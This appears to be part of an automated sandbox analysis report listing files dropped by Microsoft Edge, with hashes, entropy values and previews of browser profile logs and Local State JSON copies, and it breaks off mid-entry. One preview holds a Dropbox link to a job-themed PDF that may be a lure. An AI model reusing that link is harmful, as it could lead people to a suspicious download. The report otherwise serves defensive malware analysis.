                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):5266
                                                                                                                                                                                                                                                                  Entropy (8bit):5.778521253926479
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:F3wr6SGYgpnkr6SGRxKBOOFlbtr6SGFO+OMIuQtr6SGFO+OMIuDv:ZYCpnEuKvj9L9cv
                                                                                                                                                                                                                                                                  MD5:39EBB7086C4C8944D7DF2D10B74A24E2
                                                                                                                                                                                                                                                                  SHA1:995A95E7BF0734245F1D6AE343EFCC6820A35CB1
                                                                                                                                                                                                                                                                  SHA-256:3FC5DA83E0EE6BCF0F96D90561D0C3F71A74DFABB1A5D04598596FF03C3221B8
                                                                                                                                                                                                                                                                  SHA-512:04F70B519474C92594CCD173ED10906408F11903F89F4752F716EEC338381E460B87827E077713513DF7AAA97B00AA3B913A08CC2C3705F88164EF74C99212AD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:A..r.................20_1_1...1.,U.................20_1_1...1..$.0................39_config..........6.....n ...1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............>g.V...............021_download,5fc53c58-fe77-4e2d-8c7c-481d2c4048be......$5fc53c58-fe77-4e2d-8c7c-481d2c4048be.................".....https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1...https://ucdccc1744965d58711471073024.dl.dropboxusercontent.com/cd/0/get/CgigYwzyq_gTs7gdIfDnmMAEanh123xyN-mpYu5zpIsZ6oepFNCBt4UT3cO-fSV6JmRJFyvYfC7vC78d3D9pMbbdUbCSQbpG6NWyiCZaiF8STtQdUi1fKa2xrP

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.135159779768641
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPH4q2PN723oH+TcwtfrK+IFUt8OoPGJZmw+OoPGDkwON723oH+TcwtfrUeLJ:7fvVaYeb23FUt8O//+Ot5OaYeb3J
                                                                                                                                                                                                                                                                  MD5:41BF1E78F6FAD0ADC3EEAE3B3E5893D3
                                                                                                                                                                                                                                                                  SHA1:517221173A1C6632DF6AC3C1094B1A96FF2E88EF
                                                                                                                                                                                                                                                                  SHA-256:CA6A9C5D2E5221CF6AB79FF043EF79F1CDE4E96AA324DB727F38A90CE2E2BB6F
                                                                                                                                                                                                                                                                  SHA-512:C63BA06F8BBC3CB852A422D221EB9D505153234CADBC609B77D63A8723643A83C011B69591FE79243BBD8D4FC7E71169929029B85DEA94FE5CF21A16D05E2B9F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.221 1d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/19-07:44:24.222 1d04 Recovering log #3.2024/12/19-07:44:24.222 1d04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.135159779768641
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPH4q2PN723oH+TcwtfrK+IFUt8OoPGJZmw+OoPGDkwON723oH+TcwtfrUeLJ:7fvVaYeb23FUt8O//+Ot5OaYeb3J
                                                                                                                                                                                                                                                                  MD5:41BF1E78F6FAD0ADC3EEAE3B3E5893D3
                                                                                                                                                                                                                                                                  SHA1:517221173A1C6632DF6AC3C1094B1A96FF2E88EF
                                                                                                                                                                                                                                                                  SHA-256:CA6A9C5D2E5221CF6AB79FF043EF79F1CDE4E96AA324DB727F38A90CE2E2BB6F
                                                                                                                                                                                                                                                                  SHA-512:C63BA06F8BBC3CB852A422D221EB9D505153234CADBC609B77D63A8723643A83C011B69591FE79243BBD8D4FC7E71169929029B85DEA94FE5CF21A16D05E2B9F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.221 1d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/19-07:44:24.222 1d04 Recovering log #3.2024/12/19-07:44:24.222 1d04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):816
                                                                                                                                                                                                                                                                  Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                  MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                  SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                  SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                  SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....X...................20_.....W.J+.................19_......qY.................18_.....'}2..................37_.......c..................38_......i...................39_.....Owa..................20_.....4.9..................20_.....B.I..................19_..........................18_.....2.1..................37_..........................38_......=.%.................39_.....p.j..................9_.....JJ...................9_.....|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... ......................__global... .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):346
                                                                                                                                                                                                                                                                  Entropy (8bit):5.156927175952311
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPNB4q2PN723oH+TcwtfrzAdIFUt8OoP8JZmw+OoP8DkwON723oH+TcwtfrzILJ:7rvVaYeb9FUt8Od/+Ov5OaYeb2J
                                                                                                                                                                                                                                                                  MD5:17379BDCF4D8DA45230B6F02E44AF20A
                                                                                                                                                                                                                                                                  SHA1:DA6B994703D90ECED71B3F8FFD310F139875B3A0
                                                                                                                                                                                                                                                                  SHA-256:CA675FA9796E19A4634884503CC9013DE448CD7E5305529908D25A23309A98BA
                                                                                                                                                                                                                                                                  SHA-512:4AE42231617CBE05A89BBF35B4FF2BC82C3DF83BA157259DD7CF8A7B23253A98CD6CDBEE6727C8C1138C879C818028EED0928D498B18E6D7ABA931010A17CB28
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.218 1d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/19-07:44:24.219 1d04 Recovering log #3.2024/12/19-07:44:24.219 1d04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):346
                                                                                                                                                                                                                                                                  Entropy (8bit):5.156927175952311
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPNB4q2PN723oH+TcwtfrzAdIFUt8OoP8JZmw+OoP8DkwON723oH+TcwtfrzILJ:7rvVaYeb9FUt8Od/+Ov5OaYeb2J
                                                                                                                                                                                                                                                                  MD5:17379BDCF4D8DA45230B6F02E44AF20A
                                                                                                                                                                                                                                                                  SHA1:DA6B994703D90ECED71B3F8FFD310F139875B3A0
                                                                                                                                                                                                                                                                  SHA-256:CA675FA9796E19A4634884503CC9013DE448CD7E5305529908D25A23309A98BA
                                                                                                                                                                                                                                                                  SHA-512:4AE42231617CBE05A89BBF35B4FF2BC82C3DF83BA157259DD7CF8A7B23253A98CD6CDBEE6727C8C1138C879C818028EED0928D498B18E6D7ABA931010A17CB28
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.218 1d04 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/19-07:44:24.219 1d04 Recovering log #3.2024/12/19-07:44:24.219 1d04 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):120
                                                                                                                                                                                                                                                                  Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                  MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                  SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                  SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                  SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13
                                                                                                                                                                                                                                                                  Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                  MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                  SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                  SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                  SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:117.0.2045.55

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38b3a.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF38bd6.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39106.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3b7d7.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
                                                                                                                                                                                                                                                                  SHA-256:9221B31FD33C972166CDA29BE37D6DE3EB5CE606EDF4EC309F2DE1A78A09AFCF
                                                                                                                                                                                                                                                                  SHA-512:48DFF35333ACEFD29420D3344F4CFF93A48204548284DF3503C3DB7F17E9869581C24C2DB10DF2646B1AC7383057B21C3BF6E2CB7D9B1B1F7B00B1828FAF8E63
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c66e.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44455
                                                                                                                                                                                                                                                                  Entropy (8bit):6.089783421352068
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWvdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn5EkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                  MD5:1716B7F7F23A5073C1EAF40BD983FF39
                                                                                                                                                                                                                                                                  SHA1:D39AEC898E96949C275407978EF19AAE48116E08
